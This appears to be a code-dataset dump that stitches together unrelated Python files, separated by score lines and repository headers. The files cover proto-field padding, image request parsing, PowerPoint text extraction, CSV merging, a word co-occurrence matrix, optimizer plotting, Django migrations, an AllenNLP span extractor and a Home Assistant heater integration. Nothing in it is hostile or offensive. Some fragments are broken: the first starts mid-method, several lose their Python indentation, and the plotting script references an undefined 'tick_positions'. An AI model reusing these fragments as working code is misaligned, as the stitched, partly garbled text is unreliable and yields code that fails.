# Checking all features in items, padding them and converting them to the right dtype
for feature in item:
assert feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature
proto_field = self.proto_fields[feature]
# Converting sets to lists
if isinstance(item[feature], set):
item[feature] = list(item[feature])
# Var Len - Converting and flattening
# Scalar - Just converting
# Fixed Len - Padding and converting
if proto_field.dtype is None:
continue
elif isinstance(proto_field, VarProtoField):
item[feature] = np.array(item[feature], proto_field.dtype).flatten()
elif not proto_field.shape:
item[feature] = np.array(item[feature], proto_field.dtype)
elif isinstance(proto_field, FixedProtoField):
item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype)
# Returning item
return item
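    # Sketch (assuming pad_list zero-pads to the target shape): with a
    # FixedProtoField(shape=[4], dtype=numpy.int32), prepare_item({'f': [1, 2]})
    # yields {'f': array([1, 2, 0, 0], dtype=int32)}.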
@abstractmethod
def get_results(self, queue_name, item, retry_on_failure=True, **kwargs):
""" Computes the outputs of a name using item as inout
:param queue_name: The name of the queue where to put the item
:param item: A dictionary with the fields required for that queue
:param retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
:return: A tornado.concurrent.Future that will be set with the results when they become available
"""
raise NotImplementedError()
@staticmethod
def make_session_run_hook():
""" Builds a SessionRunHook for the MonitoredTrainingSession object """
def close(self):
""" Stops the dataset """
self._is_closing = True
| 2.03125 | 2 |
Image/Analysis.py | fox-ahri/image | 0 | 12797540 | from PIL import ImageFont
def analysis(obj):
params = dict()
params['size'] = size(obj)
params['rgb'] = color(obj)
params['lines'] = line(obj)
params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses')
params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles')
params['texts'] = text(obj)
params['store'] = store(obj)
params['point'] = point(obj)
params['opacity'] = opacity(obj)
params['original'] = o if (o := obj.get('original')) else False
params['colour'] = colour(obj)
params['album'] = album(obj)
return params
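# Example (hypothetical request params):
#   analysis({'w': '200', 'h': '100', 'rgb': '255,0,0'})
#   -> includes {'size': (200, 100), 'rgb': (255, 0, 0), 'lines': [], ...}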
def opacity(obj):
if a := o if (o := obj.get('a')) else None:
return op if 0 <= (op := int(a)) <= 255 else None
return None
def album(obj):
data = params.split(',') if (params := obj.get('album')) else None
if data and len(data) >= 2:
return [data[0], data[1]]
return None
def colour(obj):
data = params.split(',') if (params := obj.get('colour')) else None
if data and len(data) >= 7:
return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))]
return None
def store(obj):
bg = None if not obj.get('store') else obj.get('store').split(',')
if bg:
if len(bg) >= 2:
bg_args = [bg[0], bg[1]]
return bg_args
if len(bg) >= 1:
bg_args = [bg[0], '0']
return bg_args
else:
return None
def point(obj):
return None if not obj.get('point') else float(obj.get('point'))
def size(obj):
width = int(obj.get('width') or obj.get('w') or '400')
height = int(obj.get('height') or obj.get('h') or '300')
return width, height
def color(obj):
rgb = (obj.get('rgb') or '200,200,200').split(',')
rgb[0] = rgb[0] if not obj.get('r') else obj.get('r')
rgb[1] = rgb[1] if not obj.get('g') else obj.get('g')
rgb[2] = rgb[2] if not obj.get('b') else obj.get('b')
return int(rgb[0]), int(rgb[1]), int(rgb[2])
def line(obj):
lines = list()
if lines_args := obj.get('lines'):
line_args = lines_args.split(';')
for i in line_args:
try:
line_arg = i.split(',')
if len(line_arg) >= 7:
lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),
(int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))])
elif len(line_arg) >= 4:
lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)])
except Exception as ex:
print(str(ex))
return lines
def ellipse_and_rectangle(obj, shape):
shapes = list()
if shapes_args := obj.get(shape):
shape_args = shapes_args.split(';')
for i in shape_args:
try:
shape_arg = i.split(',')
if len(shape_arg) >= 10:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),
(int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))])
elif len(shape_arg) >= 7:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),
(0, 0, 0)])
elif len(shape_arg) >= 4:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(0, 0, 0), (0, 0, 0)])
except Exception as ex:
print(str(ex))
return shapes
def text(obj):
texts = list()
if texts_args := obj.get('texts'):
text_args = texts_args.split(';')
# ttf = '/home/ahri/code/AhriImage/Image/font.ttf'
ttf = '/project/Image/font.ttf'
for i in text_args:
text_arg = i.split(',')
            if len(text_arg) >= 7:
                texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],
                              (int(text_arg[3]), int(text_arg[4]), int(text_arg[5])),
                              ImageFont.truetype(ttf, int(text_arg[6]))])
            elif len(text_arg) >= 6:
                texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],
                              (int(text_arg[3]), int(text_arg[4]), int(text_arg[5])),
                              ImageFont.truetype(ttf, 30)])
            elif len(text_arg) >= 3:
                texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0),
                              ImageFont.truetype(ttf, 30)])
return texts
| 2.875 | 3 |
pythonoffice/ppt_get.py | YEZHIAN1996/pythonstudy | 1 | 12797541 | <filename>pythonoffice/ppt_get.py<gh_stars>1-10
from pptx import Presentation
p = Presentation('a.pptx')
for slide in p.slides:
for shape in slide.shapes:
if shape.has_text_frame:
print(shape.text_frame.text)
if shape.has_table:
for cell in shape.table.iter_cells():
print(cell.text)
| 2.953125 | 3 |
old_code/datawrangle.py | Napam/Stockybocky | 2 | 12797542 | '''Combines oslo bors and yahoo data'''
import numpy as np
import pandas as pd
from pprint import pprint
import scrapeconfig as cng
def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str):
'''
Get filenames for csv files from Oslo Bors and Yahoo Finance and merges them
to one large dataset.
'''
df_bors = pd.read_csv(bors_name)
df_stats = pd.read_csv(yahoo_name)
# Some of the features from Yahoo Finance
# are very sparse, so here I am picking the ones
# that are not so sparse and that I FEEL makes
# makes sense to include.
df_stats = df_stats[cng.SELECTED_FEATURES]
df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON)
df_combined.set_index(cng.MERGE_DFS_ON, inplace=True)
df_combined.to_csv(cng.FINALDATASET_FILENAME)
if __name__ == '__main__':
merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME, cng.FINALDATASET_FILENAME)
| 3.0625 | 3 |
co-occurrence_matrix.py | fanglala997/test | 0 | 12797543 | <filename>co-occurrence_matrix.py
import matplotlib
import fileDispose
import numpy as np
def get_bench(text,n):
"""
    get_bench(list, int)
    Builds the ranges over which the co-occurrence window iterates; for
    couplets, the first and second lines are merged into one range.
    text: list of tokenized sentences
    n: number of consecutive sentences to merge
"""
    bench = []
    label = 0
    for i in range(len(text)):
        if i % n == 0:
            label = i
            continue
        else:
            text[label].extend(text[i])
            bench.append(text[label])
    return bench
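# Example: get_bench([['a'], ['b'], ['c'], ['d']], 2) -> [['a', 'b'], ['c', 'd']]
# (couplet halves are merged pairwise into single token lists)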
def co_occurrence_matrix_for_word(window, text, word_listindex):
    """Builds a word-by-word co-occurrence matrix within a +/- `window` offset."""
    re_matrix = np.zeros((len(word_listindex), len(word_listindex)), dtype=int)
    bench = get_bench(text, 2)
    for sentence in bench:
        for i in range(len(sentence)):
            # row index is the vocabulary index of the centre word
            row = int(word_listindex[sentence[i]])
            for j in range(1, window + 1):
                if i - j >= 0:
                    col = int(word_listindex[sentence[i - j]])
                    re_matrix[row, col] += 1
                if i + j < len(sentence):
                    col = int(word_listindex[sentence[i + j]])
                    re_matrix[row, col] += 1
    return re_matrix
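# Sketch: with window=1 and word_listindex {'a': 0, 'b': 1}, text [['a'], ['b']]
# merges to [['a', 'b']] and yields re_matrix[0, 1] == 1 and re_matrix[1, 0] == 1.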
total_list = fileDispose.getFile('total_list.json')
word_listindex = fileDispose.getFile('allcut_word_listindex.json')
co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex)
# fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json')
np.savetxt('./Data/train/co_occurrence.txt',co_occurrence)
# print(co_occurrence[:,1])
# bench = get_bench(total_list,2)
# print(bench[:10])
# danzi = 0
# shuangzi = 0
# qita = 0
# for k in word_listindex:
# if (len(word_listindex[k]) == 1):
# danzi += 1
# elif (len(word_listindex[k]) == 2):
# shuangzi += 1
# else:
# qita += 1
# print('single-character words:', danzi)
# print('two-character words:', shuangzi)
# print('other words:', qita)
# for i, (k, v) in enumerate(word_listindex.items()):
# if i in range(0, 10):
# print(k, v) | 2.8125 | 3 |
scripts/plot_performance.py | shercklo/LTO-CMA | 7 | 12797544 | <reponame>shercklo/LTO-CMA
import os
import json
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
from datetime import datetime
sns.set()
from matplotlib import rcParams
rcParams["font.size"] = "40"
rcParams['text.usetex'] = False
rcParams['font.family'] = 'serif'
rcParams['figure.figsize'] = (16.0, 9.0)
rcParams['figure.frameon'] = True
rcParams['figure.edgecolor'] = 'k'
rcParams['grid.color'] = 'k'
rcParams['grid.linestyle'] = ':'
rcParams['grid.linewidth'] = 0.5
rcParams['axes.linewidth'] = 3
rcParams['axes.edgecolor'] = 'k'
rcParams['axes.grid.which'] = 'both'
rcParams['legend.frameon'] = 'True'
rcParams['legend.framealpha'] = 1
rcParams['legend.fontsize'] = 30
rcParams['ytick.major.size'] = 32
rcParams['ytick.major.width'] = 6
rcParams['ytick.minor.size'] = 6
rcParams['ytick.minor.width'] = 1
rcParams['xtick.major.size'] = 32
rcParams['xtick.major.width'] = 6
rcParams['xtick.minor.size'] = 6
rcParams['xtick.minor.width'] = 1
rcParams['xtick.labelsize'] = 32
rcParams['ytick.labelsize'] = 32
def dir_path(path):
if os.path.isfile(path):
return path
else:
        raise argparse.ArgumentTypeError("readable_dir: %s is not a valid path to a file" % path)
parser = argparse.ArgumentParser(description='Script to plot LTO test data.')
parser.add_argument('--lto_path', type=dir_path, help="Path to the LTO data file.",
default=os.path.join("..","examples","10BBOB","GallaghersGaussian21hi_LTO.json"))
parser.add_argument('--csa_path', type=dir_path, help="Path to the CSA data file.",
default=os.path.join("..","data","PPSN_LTO_Data","CSA_Data","CSA_Plots_10D","GallaghersGaussian21hi.json"))
parser.add_argument('--function', type=str, help="Function being plotted",
default="GallaghersGaussian21hi")
args = parser.parse_args()
lto_path = args.lto_path
csa_path = args.csa_path
function = args.function
popsize = 10
data_LTO = {}
data_CSA = {}
with open(lto_path) as json_file:
data_LTO = json.load(json_file)
with open(csa_path) as json_file:
data_CSA = json.load(json_file)
generations = len(data_LTO["Average costs LTO"])
num_feval = generations * popsize
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Step Size", fontsize=50)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.xticks()
plt.title(function)
plt.fill_between(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)),
np.subtract(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
np.add(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
color=sns.xkcd_rgb["magenta"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)), data_LTO["Sigma LTO"], linewidth=4,
label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)),
np.subtract(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
np.add(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
color=sns.xkcd_rgb["green"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)), data_CSA["Sigma CSA"], linewidth=4,
label="CSA", color=sns.xkcd_rgb["green"])
plt.legend(loc=0, fontsize=25, ncol=2)
type = "StepSize"
output_path = os.path.join("..","plots")
os.makedirs(output_path, exist_ok=True)
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
plt.tick_params(axis='x', which='minor')
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Objective Value", fontsize=50)
plt.xscale("log")
plt.title(function)
plt.xticks(tick_positions, [str(pos * popsize) for pos in tick_positions])
plt.fill_between(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)),
np.subtract(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]),
np.add(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]), alpha=0.1,
color=sns.xkcd_rgb["magenta"])
plt.plot(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)), data_LTO["Average costs LTO"],
linewidth=4, label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)),
np.subtract(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]),
np.add(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]), alpha=0.1,
color=sns.xkcd_rgb["green"])
plt.plot(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)), data_CSA["Average costs CSA"],
linewidth=4, label="CSA", color=sns.xkcd_rgb["green"])
plt.legend(loc=0, fontsize=25, ncol=2)
type = "ObjectiveValue"
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
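# Possible refactor (sketch, not part of the original script): both figures
# repeat the same mean +/- std band pattern, which a helper could factor out:
#
# def plot_with_band(mean, std, label, color):
#     x = np.arange(1, len(mean) + 1)
#     plt.fill_between(x, np.subtract(mean, std), np.add(mean, std),
#                      color=sns.xkcd_rgb[color], alpha=0.1)
#     plt.plot(x, mean, linewidth=4, label=label, color=sns.xkcd_rgb[color])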
| 2.0625 | 2 |
cpdb/analytics/migrations/0004_alter_searchtracking_query_type.py | invinst/CPDBv2_backend | 25 | 12797545 | <reponame>invinst/CPDBv2_backend<gh_stars>10-100
# Generated by Django 2.1.3 on 2018-11-23 08:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('analytics', '0003_searchtracking'),
]
operations = [
migrations.AlterField(
model_name='searchtracking',
name='query_type',
field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20),
),
]
| 1.445313 | 1 |
LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py | SanaaCHAOU/laureat_management_ENSAT | 0 | 12797546 | <filename>LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py
# Generated by Django 3.0.2 on 2020-01-10 20:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('laureats', '0007_laureat_filiere'),
]
operations = [
migrations.CreateModel(
name='Etudiant',
fields=[
('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')),
('etablissement', models.CharField(default='', max_length=100)),
('sujet_etude', models.CharField(default='', max_length=255)),
('new_date_inscription', models.DateField()),
],
options={
'ordering': ['new_date_inscription'],
},
bases=('laureats.laureat',),
),
]
| 1.570313 | 2 |
spanmb/models/span_extractor.py | zmmzGitHub/SpanMB_BERT | 0 | 12797547 | <filename>spanmb/models/span_extractor.py
import torch
from torch.nn.parameter import Parameter
from overrides import overrides
from allennlp.modules.span_extractors.span_extractor import SpanExtractor
from allennlp.modules.token_embedders.embedding import Embedding
from allennlp.nn import util
from allennlp.common.checks import ConfigurationError
class MaxSpanExtractor(SpanExtractor):
def __init__(
self,
input_dim: int,
num_width_embeddings: int = None,
span_width_embedding_dim: int = None,
bucket_widths: bool = False,
) -> None:
super().__init__()
self._input_dim = input_dim
self._num_width_embeddings = num_width_embeddings
self._bucket_widths = bucket_widths
if num_width_embeddings is not None and span_width_embedding_dim is not None:
self._span_width_embedding = Embedding(
num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim
)
elif num_width_embeddings is not None or span_width_embedding_dim is not None:
raise ConfigurationError(
"To use a span width embedding representation, you must"
"specify both num_width_buckets and span_width_embedding_dim."
)
else:
self._span_width_embedding = None
def get_input_dim(self) -> int:
return self._input_dim
def get_output_dim(self) -> int:
if self._span_width_embedding is not None:
return self._input_dim + self._span_width_embedding.get_output_dim()
return self._input_dim
@overrides
def forward(
self,
sequence_tensor: torch.FloatTensor,
span_indices: torch.LongTensor,
sequence_mask: torch.BoolTensor = None,
span_indices_mask: torch.BoolTensor = None,
    ) -> torch.FloatTensor:
# shape (batch_size, num_spans)
span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)]
if span_indices_mask is not None:
# It's not strictly necessary to multiply the span indices by the mask here,
# but it's possible that the span representation was padded with something other
# than 0 (such as -1, which would be an invalid index), so we do so anyway to
# be safe.
span_starts = span_starts * span_indices_mask
span_ends = span_ends * span_indices_mask
        # Shape: (batch_size, num_spans, max_span_width, embedding_dim)
        span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices)
        # Max-pool over the span width dimension while ignoring padded positions.
        # (Zeroing masked positions before torch.max would be wrong whenever all
        # real values in a span are negative, so use masked_max instead.)
        # Shape: (batch_size, num_spans, embedding_dim)
        span_max_embeddings = util.masked_max(span_embeddings, span_mask.unsqueeze(-1), dim=2)
if self._span_width_embedding is not None:
# Embed the span widths and concatenate to the rest of the representations.
if self._bucket_widths:
span_widths = util.bucket_values(
span_ends - span_starts, num_total_buckets=self._num_width_embeddings
)
else:
span_widths = span_ends - span_starts
span_width_embeddings = self._span_width_embedding(span_widths)
span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1)
if span_indices_mask is not None:
return span_max_embeddings * span_indices_mask.unsqueeze(-1)
return span_max_embeddings
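# Illustrative usage sketch (not part of the original module; shapes and span
# indices below are assumptions chosen for the example):
if __name__ == "__main__":
    extractor = MaxSpanExtractor(input_dim=8, num_width_embeddings=10, span_width_embedding_dim=4)
    sequence = torch.randn(2, 20, 8)  # (batch_size, seq_len, input_dim)
    # Inclusive (start, end) token indices for two spans per batch element.
    spans = torch.tensor([[[0, 3], [5, 9]], [[1, 1], [2, 6]]])
    print(extractor(sequence, spans).shape)  # torch.Size([2, 2, 12])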
| 2.328125 | 2 |
Curso Python Completo - Udemy/Teste/conjuntos.py | Cauenumo/Python | 0 | 12797548 | <gh_stars>0
s = set()
s.add(2)
print(s)
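# A set ignores duplicate insertions, so adding 2 again changes nothing:
s.add(2)
print(s)  # still {2}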
| 1.71875 | 2 |
custom_components/goldair_climate/heater/climate.py | KiLLeRRaT/homeassistant-goldair-climate | 0 | 12797549 | """
Goldair WiFi Heater device.
"""
import logging
import json
from homeassistant.const import (
ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE
)
from homeassistant.components.climate import ClimateDevice
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE, ATTR_PRESET_MODE,
HVAC_MODE_OFF, HVAC_MODE_HEAT,
SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE
)
from custom_components.goldair_climate import GoldairTuyaDevice
_LOGGER = logging.getLogger(__name__)
ATTR_TARGET_TEMPERATURE = 'target_temperature'
ATTR_CHILD_LOCK = 'child_lock'
ATTR_FAULT = 'fault'
ATTR_POWER_MODE_AUTO = 'auto'
ATTR_POWER_MODE_USER = 'user'
ATTR_POWER_LEVEL = 'power_level'
ATTR_DISPLAY_ON = 'display_on'
ATTR_POWER_MODE = 'power_mode'
ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE
STATE_COMFORT = 'Comfort'
STATE_ECO = 'Eco'
STATE_ANTI_FREEZE = 'Anti-freeze'
PROPERTY_TO_DPS_ID = {
ATTR_HVAC_MODE: '1',
ATTR_TARGET_TEMPERATURE: '2',
ATTR_TEMPERATURE: '3',
ATTR_PRESET_MODE: '4',
ATTR_CHILD_LOCK: '6',
ATTR_FAULT: '12',
ATTR_POWER_LEVEL: '101',
ATTR_DISPLAY_ON: '104',
ATTR_POWER_MODE: '105',
ATTR_ECO_TARGET_TEMPERATURE: '106'
}
# GOLDAIR GECO270
PROPERTY_TO_DPS_ID_GECO270 = {
ATTR_HVAC_MODE: '1',
ATTR_TARGET_TEMPERATURE: '3',
ATTR_TEMPERATURE: '4',
ATTR_PRESET_MODE: '5',
ATTR_CHILD_LOCK: '2',
ATTR_FAULT: '12',
ATTR_POWER_LEVEL: '101',
ATTR_DISPLAY_ON: '104',
ATTR_POWER_MODE: '105',
ATTR_ECO_TARGET_TEMPERATURE: '106'
}
HVAC_MODE_TO_DPS_MODE = {
HVAC_MODE_OFF: False,
HVAC_MODE_HEAT: True
}
PRESET_MODE_TO_DPS_MODE = {
STATE_COMFORT: 'C',
STATE_ECO: 'ECO',
STATE_ANTI_FREEZE: 'AF'
}
POWER_LEVEL_TO_DPS_LEVEL = {
'Stop': 'stop',
'1': '1',
'2': '2',
'3': '3',
'4': '4',
'5': '5',
'Auto': 'auto'
}
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE
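# Illustrative reverse lookup (sketch; assumes GoldairTuyaDevice.get_key_for_value
# inverts these dictionaries, as used throughout the class below):
# GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, 'ECO')  # -> 'Eco'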
class GoldairHeater(ClimateDevice):
"""Representation of a Goldair WiFi heater."""
def __init__(self, device):
"""Initialize the heater.
Args:
device (GoldairTuyaDevice): The device API instance."""
self._device = device
self._support_flags = SUPPORT_FLAGS
self._TEMPERATURE_STEP = 1
self._TEMPERATURE_LIMITS = {
STATE_COMFORT: {
'min': 5,
'max': 37
},
STATE_ECO: {
'min': 5,
'max': 21
}
}
# self._model = model
# _LOGGER.info(f'Setting model to {model}')
@property
def get_property_to_dps_id(self):
"""Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have"""
if self._device.model == "GECO270":
return PROPERTY_TO_DPS_ID_GECO270
else:
return PROPERTY_TO_DPS_ID
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the climate device."""
return self._device.name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._device.temperature_unit
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self.preset_mode == STATE_COMFORT:
return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE])
elif self.preset_mode == STATE_ECO:
return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE])
else:
return None
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._TEMPERATURE_STEP
@property
def min_temp(self):
"""Return the minimum temperature."""
if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:
return self._TEMPERATURE_LIMITS[self.preset_mode]['min']
else:
return None
@property
def max_temp(self):
"""Return the maximum temperature."""
if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:
return self._TEMPERATURE_LIMITS[self.preset_mode]['max']
else:
return None
def set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_PRESET_MODE) is not None:
self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE))
if kwargs.get(ATTR_TEMPERATURE) is not None:
self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE))
def set_target_temperature(self, target_temperature):
target_temperature = int(round(target_temperature))
preset_mode = self.preset_mode
if preset_mode == STATE_ANTI_FREEZE:
raise ValueError('You cannot set the temperature in Anti-freeze mode.')
limits = self._TEMPERATURE_LIMITS[preset_mode]
if not limits['min'] <= target_temperature <= limits['max']:
raise ValueError(
f'Target temperature ({target_temperature}) must be between '
f'{limits["min"]} and {limits["max"]}'
)
if preset_mode == STATE_COMFORT:
self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature)
elif preset_mode == STATE_ECO:
self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE])
@property
def hvac_mode(self):
"""Return current HVAC mode, ie Heat or Off."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE])
if dps_mode is not None:
return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode)
else:
return STATE_UNAVAILABLE
@property
def hvac_modes(self):
"""Return the list of available HVAC modes."""
return list(HVAC_MODE_TO_DPS_MODE.keys())
def set_hvac_mode(self, hvac_mode):
"""Set new HVAC mode."""
dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode]
self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode)
@property
def preset_mode(self):
"""Return current preset mode, ie Comfort, Eco, Anti-freeze."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE])
        # Compare against the known preset DPS values (e.g. 'C', 'ECO', 'AF'),
        # not the property-name keys of the DPS mapping.
        if dps_mode is not None and dps_mode not in PRESET_MODE_TO_DPS_MODE.values():
            _LOGGER.debug('Could not load correct preset mode from api status. Defaulting to Comfort')
            _LOGGER.debug(f'dps_mode was: {dps_mode}, property mapping was: {json.dumps(self.get_property_to_dps_id)}')
            dps_mode = 'C'
if dps_mode is not None:
return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode)
else:
return None
@property
def preset_modes(self):
"""Return the list of available preset modes."""
return list(PRESET_MODE_TO_DPS_MODE.keys())
def set_preset_mode(self, preset_mode):
"""Set new preset mode."""
dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode]
self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode)
@property
def swing_mode(self):
"""Return the power level."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE])
if dps_mode == ATTR_POWER_MODE_USER:
return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL])
elif dps_mode == ATTR_POWER_MODE_AUTO:
return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode)
else:
return None
@property
def swing_modes(self):
"""List of power levels."""
return list(POWER_LEVEL_TO_DPS_LEVEL.keys())
def set_swing_mode(self, swing_mode):
"""Set new power level."""
new_level = swing_mode
if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys():
raise ValueError(f'Invalid power level: {new_level}')
dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level]
self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level)
def update(self):
self._device.refresh()
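# Illustrative call sequence (sketch; `heater` is a hypothetical instance
# wrapping a configured GoldairTuyaDevice):
# heater.set_preset_mode(STATE_ECO)
# heater.set_temperature(temperature=18)  # routed to set_target_temperature()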
| 2.203125 | 2 |
pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py | apapadimitriou/pydfs-lineup-optimizer | 0 | 12797550 | <filename>pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py
from .importer import *
from .settings import *
__all__ = [
'DraftstarsCSVImporter', 'DraftstarsNFLSettings'
]
1.210938 | 1